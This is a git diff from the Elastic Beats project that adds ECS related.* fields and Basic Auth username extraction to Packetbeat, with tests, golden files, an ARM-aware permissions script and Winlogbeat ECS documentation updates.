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" } diff --git a/packetbeat/protos/amqp/amqp.go b/packetbeat/protos/amqp/amqp.go index 1113d4ee6dfb..f0c1e26dd28a 100644 --- a/packetbeat/protos/amqp/amqp.go +++ b/packetbeat/protos/amqp/amqp.go @@ -455,6 +455,10 @@ func (amqp *amqpPlugin) publishTransaction(t *amqpTransaction) { } fields["amqp"] = t.amqp + if userID, found := t.amqp["user-id"]; found { + fields["user.id"] = userID + } + //let's try to convert request/response to a readable format if amqp.sendRequest { if t.method == "basic.publish" { diff --git a/packetbeat/protos/cassandra/pub.go b/packetbeat/protos/cassandra/pub.go index c4d0164310e4..3b90c53feae7 100644 --- a/packetbeat/protos/cassandra/pub.go +++ b/packetbeat/protos/cassandra/pub.go @@ -69,7 +69,9 @@ func (pub *transPub) createEvent(requ, resp *message) beat.Event { evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(&src) + pbf.AddIP(src.IP) pbf.SetDestination(&dst) + pbf.AddIP(dst.IP) pbf.Event.Dataset = "cassandra" pbf.Network.Transport = "tcp" pbf.Network.Protocol = pbf.Event.Dataset diff --git a/packetbeat/protos/http/event.go b/packetbeat/protos/http/event.go index 691f8b1d1560..f53ed9b632d2 100644 --- a/packetbeat/protos/http/event.go +++ b/packetbeat/protos/http/event.go @@ -42,6 +42,9 @@ type ProtocolFields struct { // Referrer for this HTTP request. RequestReferrer common.NetString `ecs:"request.referrer"` + // HTTP request mime-type. + RequestMIMEType string `ecs:"request.mime_type"` + // Http response status code. ResponseStatusCode int64 `ecs:"response.status_code"` @@ -69,6 +72,9 @@ type ProtocolFields struct { // HTTP response headers. ResponseHeaders common.MapStr `packetbeat:"response.headers"` + // HTTP response mime-type. + ResponseMIMEType string `ecs:"response.mime_type"` + // HTTP response status phrase. ResponseStatusPhrase common.NetString `packetbeat:"response.status_phrase"` } diff --git a/packetbeat/protos/http/http.go b/packetbeat/protos/http/http.go index 3dd7484822ef..dd57ada3ce97 100644 --- a/packetbeat/protos/http/http.go +++ b/packetbeat/protos/http/http.go @@ -19,6 +19,7 @@ package http import ( "bytes" + "encoding/base64" "fmt" "net" "net/url" @@ -439,6 +440,11 @@ func (http *httpPlugin) handleHTTP( m.tcpTuple = *tcptuple m.direction = dir m.cmdlineTuple = http.watcher.FindProcessesTupleTCP(tcptuple.IPPort()) + + if !http.redactAuthorization { + m.username = extractBasicAuthUser(m.headers) + } + http.hideHeaders(m) if m.isRequest { @@ -533,6 +539,8 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(src) pbf.SetDestination(dst) + pbf.AddIP(src.IP) + pbf.AddIP(dst.IP) pbf.Network.Transport = "tcp" pbf.Network.Protocol = "http" @@ -552,6 +560,9 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { host, port := extractHostHeader(string(requ.host)) if net.ParseIP(host) == nil { pbf.Destination.Domain = host + pbf.AddHost(host) + } else { + pbf.AddIP(host) } if port == 0 { port = int(pbf.Destination.Port) @@ -560,6 +571,7 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { } pbf.Event.Start = requ.ts pbf.Network.ForwardedIP = string(requ.realIP) + pbf.AddIP(string(requ.realIP)) pbf.Error.Message = requ.notes // http @@ -568,6 +580,7 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { httpFields.RequestBodyBytes = int64(requ.contentLength) httpFields.RequestMethod = bytes.ToLower(requ.method) httpFields.RequestReferrer = requ.referer + pbf.AddHost(string(requ.referer)) if requ.sendBody && len(requ.body) > 0 { httpFields.RequestBodyBytes = int64(len(requ.body)) httpFields.RequestBodyContent = common.NetString(requ.body) @@ -588,6 +601,11 @@ func (http *httpPlugin) newTransaction(requ, resp *message) beat.Event { } fields["method"] = httpFields.RequestMethod fields["query"] = fmt.Sprintf("%s %s", requ.method, path) + + if requ.username != "" { + fields["user.name"] = requ.username + pbf.AddUser(requ.username) + } } if resp != nil { @@ -913,3 +931,28 @@ func (ml *messageList) pop() *message { func (ml *messageList) last() *message { return ml.tail } + +func extractBasicAuthUser(headers map[string]common.NetString) string { + const prefix = "Basic " + + auth := string(headers["authorization"]) + if len(auth) < len(prefix) || !strings.EqualFold(auth[:len(prefix)], prefix) { + return "" + } + + c, err := base64.StdEncoding.DecodeString(auth[len(prefix):]) + if err != nil { + c, err = base64.RawStdEncoding.DecodeString(auth[len(prefix):]) + if err != nil { + return "" + } + } + + cs := string(c) + s := strings.IndexByte(cs, ':') + if s < 0 { + return "" + } + + return cs[:s] +} diff --git a/packetbeat/protos/http/http_parser.go b/packetbeat/protos/http/http_parser.go index 748ea9dc712b..be4343ea1207 100644 --- a/packetbeat/protos/http/http_parser.go +++ b/packetbeat/protos/http/http_parser.go @@ -62,6 +62,7 @@ type message struct { isChunked bool headers map[string]common.NetString size uint64 + username string rawHeaders []byte diff --git a/packetbeat/protos/http/http_test.go b/packetbeat/protos/http/http_test.go index 0fcf94a3f397..d6696e4b4008 100644 --- a/packetbeat/protos/http/http_test.go +++ b/packetbeat/protos/http/http_test.go @@ -921,6 +921,36 @@ func TestHttpParser_RedactAuthorization(t *testing.T) { assert.True(t, proxyObscured) } +func TestExtractBasicAuthUser(t *testing.T) { + logp.TestingSetup(logp.WithSelectors("http", "httpdetailed")) + + http := httpModForTests(nil) + http.parserConfig.sendHeaders = true + http.parserConfig.sendAllHeaders = true + + data := []byte("POST /services/ObjectControl?ID=client0 HTTP/1.1\r\n" + + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.5472)\r\n" + + "Content-Type: text/xml; charset=utf-8\r\n" + + "SOAPAction: \"\"\r\n" + + "Authorization: Basic ZHVtbXk6NmQlc1AwOC1XemZ3Cg\r\n" + + "Proxy-Authorization: Basic cHJveHk6MWM3MGRjM2JhZDIwCg==\r\n" + + "Host: production.example.com\r\n" + + "Content-Length: 0\r\n" + + "Expect: 100-continue\r\n" + + "Accept-Encoding: gzip\r\n" + + "X-Forwarded-For: 10.216.89.132\r\n" + + "\r\n") + + st := &stream{data: data, message: new(message)} + + ok, _ := testParseStream(http, st, 0) + + username := extractBasicAuthUser(st.message.headers) + + assert.True(t, ok) + assert.Equal(t, "dummy", username) +} + func TestHttpParser_RedactAuthorization_raw(t *testing.T) { http := httpModForTests(nil) http.redactAuthorization = true diff --git a/packetbeat/protos/mongodb/mongodb.go b/packetbeat/protos/mongodb/mongodb.go index 28a9350840ee..b05ebce91508 100644 --- a/packetbeat/protos/mongodb/mongodb.go +++ b/packetbeat/protos/mongodb/mongodb.go @@ -382,7 +382,9 @@ func (mongodb *mongodbPlugin) publishTransaction(t *transaction) { evt, pbf := pb.NewBeatEvent(t.ts) pbf.SetSource(&t.src) + pbf.AddIP(t.src.IP) pbf.SetDestination(&t.dst) + pbf.AddIP(t.dst.IP) pbf.Source.Bytes = int64(t.bytesIn) pbf.Destination.Bytes = int64(t.bytesOut) pbf.Event.Dataset = "mongodb" diff --git a/packetbeat/protos/mysql/mysql.go b/packetbeat/protos/mysql/mysql.go index 506b6c30ca8e..1553bdf9901e 100644 --- a/packetbeat/protos/mysql/mysql.go +++ b/packetbeat/protos/mysql/mysql.go @@ -1159,7 +1159,9 @@ func (mysql *mysqlPlugin) publishTransaction(t *mysqlTransaction) { evt, pbf := pb.NewBeatEvent(t.ts) pbf.SetSource(&t.src) + pbf.AddIP(t.src.IP) pbf.SetDestination(&t.dst) + pbf.AddIP(t.dst.IP) pbf.Source.Bytes = int64(t.bytesIn) pbf.Destination.Bytes = int64(t.bytesOut) pbf.Event.Dataset = "mysql" diff --git a/packetbeat/protos/nfs/request_handler.go b/packetbeat/protos/nfs/request_handler.go index d46560477432..fea417f4dc13 100644 --- a/packetbeat/protos/nfs/request_handler.go +++ b/packetbeat/protos/nfs/request_handler.go @@ -79,7 +79,9 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC evt, pbf := pb.NewBeatEvent(ts) pbf.SetSource(&src) + pbf.AddIP(src.IP) pbf.SetDestination(&dst) + pbf.AddIP(dst.IP) pbf.Source.Bytes = int64(xdr.size()) pbf.Event.Dataset = "nfs" pbf.Event.Start = ts @@ -102,6 +104,8 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC "xid": xid, } + fields := evt.Fields + authFlavor := xdr.getUInt() authOpaque := xdr.getDynamicOpaque() switch authFlavor { @@ -119,8 +123,14 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC pbf.Source.Domain = machine } cred["machinename"] = machine + fields["host.hostname"] = machine + cred["uid"] = credXdr.getUInt() + fields["user.id"] = cred["uid"] + cred["gid"] = credXdr.getUInt() + fields["group.id"] = cred["gid"] + cred["gids"] = credXdr.getUIntVector() rpcInfo["cred"] = cred case 6: @@ -133,7 +143,6 @@ func (r *rpc) handleCall(xid string, xdr *xdr, ts time.Time, tcptuple *common.TC xdr.getUInt() xdr.getDynamicOpaque() - fields := evt.Fields fields["status"] = common.OK_STATUS // all packages are OK for now fields["type"] = pbf.Event.Dataset fields["rpc"] = rpcInfo diff --git a/packetbeat/protos/sip/plugin.go b/packetbeat/protos/sip/plugin.go index b9b1264f9677..bdd93d241170 100644 --- a/packetbeat/protos/sip/plugin.go +++ b/packetbeat/protos/sip/plugin.go @@ -178,7 +178,9 @@ func (p *plugin) buildEvent(m *message, pkt *protos.Packet) (*beat.Event, error) src, dst := m.getEndpoints() pbf.SetSource(src) + pbf.AddIP(src.IP) pbf.SetDestination(dst) + pbf.AddIP(dst.IP) p.populateEventFields(m, pbf, sipFields) diff --git a/packetbeat/tests/system/config/golden-tests.yml b/packetbeat/tests/system/config/golden-tests.yml index 42ad0c746d28..5adcf50b5cff 100644 --- a/packetbeat/tests/system/config/golden-tests.yml +++ b/packetbeat/tests/system/config/golden-tests.yml @@ -35,3 +35,8 @@ test_cases: - name: SIP Authenticated Register pcap: pcaps/sip_authenticated_register.pcap config: {} + + - name: HTTP Basic Auth + pcap: pcaps/http_basicauth.pcap + config: + http_send_all_headers: true diff --git a/packetbeat/tests/system/golden/established_tls-expected.json b/packetbeat/tests/system/golden/established_tls-expected.json index 3cfa141af3ae..ac0145028ab9 100644 --- a/packetbeat/tests/system/golden/established_tls-expected.json +++ b/packetbeat/tests/system/golden/established_tls-expected.json @@ -250,4 +250,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/http_basic_auth-expected.json b/packetbeat/tests/system/golden/http_basic_auth-expected.json new file mode 100644 index 000000000000..3943796d3412 --- /dev/null +++ b/packetbeat/tests/system/golden/http_basic_auth-expected.json @@ -0,0 +1,155 @@ +[ + { + "@metadata.beat": "packetbeat", + "@metadata.type": "_doc", + "client.bytes": 33, + "client.ip": "172.31.98.49", + "client.port": 51958, + "destination.bytes": 61, + "destination.ip": "8.8.8.8", + "destination.port": 53, + "dns.additionals_count": 0, + "dns.answers": [ + { + "class": "IN", + "data": "2606:2800:220:1:248:1893:25c8:1946", + "name": "www.example.com", + "ttl": "21353", + "type": "AAAA" + } + ], + "dns.answers_count": 1, + "dns.authorities_count": 0, + "dns.flags.authentic_data": false, + "dns.flags.authoritative": false, + "dns.flags.checking_disabled": false, + "dns.flags.recursion_available": true, + "dns.flags.recursion_desired": true, + "dns.flags.truncated_response": false, + "dns.header_flags": [ + "RD", + "RA" + ], + "dns.id": 42715, + "dns.op_code": "QUERY", + "dns.question.class": "IN", + "dns.question.etld_plus_one": "example.com", + "dns.question.name": "www.example.com", + "dns.question.registered_domain": "example.com", + "dns.question.subdomain": "www", + "dns.question.top_level_domain": "com", + "dns.question.type": "AAAA", + "dns.resolved_ip": [ + "2606:2800:220:1:248:1893:25c8:1946" + ], + "dns.response_code": "NOERROR", + "dns.type": "answer", + "event.category": [ + "network" + ], + "event.dataset": "dns", + "event.duration": 20690000, + "event.kind": "event", + "event.type": [ + "connection", + "protocol" + ], + "method": "QUERY", + "network.bytes": 94, + "network.community_id": "1:/Zwm1tJot2cAhFAO0OxKQHuXs3Y=", + "network.protocol": "dns", + "network.transport": "udp", + "network.type": "ipv4", + "query": "class IN, type AAAA, www.example.com", + "related.ip": [ + "172.31.98.49", + "8.8.8.8", + "2606:2800:220:1:248:1893:25c8:1946" + ], + "resource": "www.example.com", + "server.bytes": 61, + "server.ip": "8.8.8.8", + "server.port": 53, + "source.bytes": 33, + "source.ip": "172.31.98.49", + "source.port": 51958, + "status": "OK", + "type": "dns" + }, + { + "@metadata.beat": "packetbeat", + "@metadata.type": "_doc", + "client.bytes": 130, + "client.ip": "172.31.98.49", + "client.port": 55874, + "destination.bytes": 1591, + "destination.domain": "www.example.com", + "destination.ip": "93.184.216.34", + "destination.port": 80, + "event.category": [ + "network" + ], + "event.dataset": "http", + "event.duration": 18341000, + "event.kind": "event", + "event.type": [ + "connection", + "protocol" + ], + "http.request.bytes": 130, + "http.request.headers.accept": "*/*", + "http.request.headers.authorization": "Basic c2ltcGxlc2ltb246YWJjZDEyMys=", + "http.request.headers.content-length": 0, + "http.request.headers.host": "www.example.com", + "http.request.headers.user-agent": "curl/7.37.1", + "http.request.method": "get", + "http.response.body.bytes": 1270, + "http.response.bytes": 1591, + "http.response.headers.accept-ranges": "bytes", + "http.response.headers.cache-control": "max-age=604800", + "http.response.headers.content-length": 1270, + "http.response.headers.content-type": "text/html", + "http.response.headers.date": "Wed, 18 Feb 2015 00:13:06 GMT", + "http.response.headers.etag": "\"359670651\"", + "http.response.headers.expires": "Wed, 25 Feb 2015 00:13:06 GMT", + "http.response.headers.last-modified": "Fri, 09 Aug 2013 23:54:35 GMT", + "http.response.headers.server": "ECS (pae/3796)", + "http.response.headers.x-cache": "HIT", + "http.response.headers.x-ec-custom-error": "1", + "http.response.status_code": 200, + "http.response.status_phrase": "ok", + "http.version": "1.1", + "method": "get", + "network.bytes": 1721, + "network.community_id": "1:TMPM5eEnGOXfxAjx6NKlyjx+X10=", + "network.protocol": "http", + "network.transport": "tcp", + "network.type": "ipv4", + "query": "GET /", + "related.hosts": [ + "www.example.com" + ], + "related.ip": [ + "172.31.98.49", + "93.184.216.34" + ], + "related.user": [ + "simplesimon" + ], + "server.bytes": 1591, + "server.domain": "www.example.com", + "server.ip": "93.184.216.34", + "server.port": 80, + "source.bytes": 130, + "source.ip": "172.31.98.49", + "source.port": 55874, + "status": "OK", + "type": "http", + "url.domain": "www.example.com", + "url.full": "http://www.example.com/", + "url.path": "/", + "url.scheme": "http", + "user.name": "simplesimon", + "user_agent.original": "curl/7.37.1" + } +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/non_established_tls-expected.json b/packetbeat/tests/system/golden/non_established_tls-expected.json index 39641270769d..846c2d9d0817 100644 --- a/packetbeat/tests/system/golden/non_established_tls-expected.json +++ b/packetbeat/tests/system/golden/non_established_tls-expected.json @@ -112,4 +112,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_1_3-expected.json b/packetbeat/tests/system/golden/tls_1_3-expected.json index 35fae5ab58ed..ba826d5408c9 100644 --- a/packetbeat/tests/system/golden/tls_1_3-expected.json +++ b/packetbeat/tests/system/golden/tls_1_3-expected.json @@ -122,4 +122,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_all_options-expected.json b/packetbeat/tests/system/golden/tls_all_options-expected.json index 0106aa9048d7..b791c38aea33 100644 --- a/packetbeat/tests/system/golden/tls_all_options-expected.json +++ b/packetbeat/tests/system/golden/tls_all_options-expected.json @@ -257,4 +257,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_no_certs-expected.json b/packetbeat/tests/system/golden/tls_no_certs-expected.json index 69af5c89b75d..d1907c51cbc0 100644 --- a/packetbeat/tests/system/golden/tls_no_certs-expected.json +++ b/packetbeat/tests/system/golden/tls_no_certs-expected.json @@ -146,4 +146,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/packetbeat/tests/system/golden/tls_not_detailed-expected.json b/packetbeat/tests/system/golden/tls_not_detailed-expected.json index 94283acb4bbb..7d521abda44b 100644 --- a/packetbeat/tests/system/golden/tls_not_detailed-expected.json +++ b/packetbeat/tests/system/golden/tls_not_detailed-expected.json @@ -90,4 +90,4 @@ "tls.version_protocol": "tls", "type": "tls" } -] +] \ No newline at end of file diff --git a/script/fix_permissions.sh b/script/fix_permissions.sh index fd65a7916b50..fce5067f7279 100755 --- a/script/fix_permissions.sh +++ b/script/fix_permissions.sh @@ -5,7 +5,14 @@ readonly LOCATION="${1?Please define the path where the fix permissions should r if ! docker version ; then echo "It requires Docker daemon to be installed and running" else + ## Detect architecture to support ARM specific docker images. + ARCH=$(uname -m| tr '[:upper:]' '[:lower:]') + if [ "${ARCH}" == "aarch64" ] ; then + DOCKER_IMAGE=arm64v8/alpine:3 + else + DOCKER_IMAGE=alpine:3.4 + fi set -e # Change ownership of all files inside the specific folder from root/root to current user/group - docker run -v ${LOCATION}:/beat alpine:3.4 sh -c "find /beat -user 0 -exec chown -h $(id -u):$(id -g) {} \;" + docker run -v "${LOCATION}":/beat ${DOCKER_IMAGE} sh -c "find /beat -user 0 -exec chown -h $(id -u):$(id -g) {} \;" fi diff --git a/tools/tools.go b/tools/tools.go index 7708afedfc46..64ab97e4fdc2 100644 --- a/tools/tools.go +++ b/tools/tools.go @@ -31,7 +31,6 @@ import ( _ "gotest.tools/gotestsum/cmd" _ "github.com/mitchellh/gox" - _ "github.com/reviewdog/reviewdog/cmd/reviewdog" _ "golang.org/x/lint/golint" _ "go.elastic.co/go-licence-detector" diff --git a/winlogbeat/Jenkinsfile.yml b/winlogbeat/Jenkinsfile.yml index 44ee6c06513c..a66ffcf1c732 100644 --- a/winlogbeat/Jenkinsfile.yml +++ b/winlogbeat/Jenkinsfile.yml @@ -51,3 +51,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/winlogbeat/cmd/root.go b/winlogbeat/cmd/root.go index e6d29e3a62ac..41259e7cab79 100644 --- a/winlogbeat/cmd/root.go +++ b/winlogbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "winlogbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/winlogbeat/docs/fields.asciidoc b/winlogbeat/docs/fields.asciidoc index 5df290e69e70..4628e29caad1 100644 --- a/winlogbeat/docs/fields.asciidoc +++ b/winlogbeat/docs/fields.asciidoc @@ -2044,7 +2044,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -2097,7 +2097,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -3288,6 +3288,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -4362,6 +4375,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -4532,6 +4558,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, 